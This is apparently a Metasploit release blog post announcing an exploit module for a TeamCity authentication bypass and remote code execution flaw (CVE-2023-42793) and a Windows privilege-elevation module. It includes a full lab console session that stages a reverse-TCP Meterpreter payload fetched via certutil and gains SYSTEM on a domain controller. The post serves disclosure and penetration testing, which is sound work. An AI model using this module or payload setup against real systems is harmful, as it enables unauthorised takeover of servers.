Last updated at Mon, 02 Oct 2023 20:33:29 GMT
TeamCity authentication bypass and remote code execution
This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.
This exploit works against both Windows and Linux targets. Example usage:
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.159.10 yes The target host(s) RPORT 8111 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as TEAMCITY_CHANGE_TIMEOUT 30 yes The timeout to wait for the changes to be applied VHOST no HTTP server virtual host Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILENAME cymQYMMk no Name to use on remote system when storing payload; cannot contain spaces. FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. LHOST 192.168.250.134 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows View the full module info with the info, or info -d command. msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit [*] Started reverse TCP handler on 192.168.250.134:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected. [*] Token already exists, deleting and generating a new one. [*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5 [*] Modifying internal.properties to allow process creation... [*] Waiting for configuration change to be applied... [*] Executing payload... [*] Resetting the internal.properties settings... [*] Sending stage (200774 bytes) to 192.168.250.237 [*] Waiting for configuration change to be applied... [*] Deleting the authentication token. [*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : DC OS : Windows 2016+ (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : MSFLAB Logged On Users : 9 Meterpreter : x64/windows meterpreter >
New module content (2)
JetBrains TeamCity Unauthenticated Remote Code Execution
Description: This adds an unauthenticated RCE for JetBrain's TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.
Microsoft Error Reporting Local Privilege Elevation Vulnerability
Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the
NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10x64 22H2.
Enhancements and features (1)
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a
git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).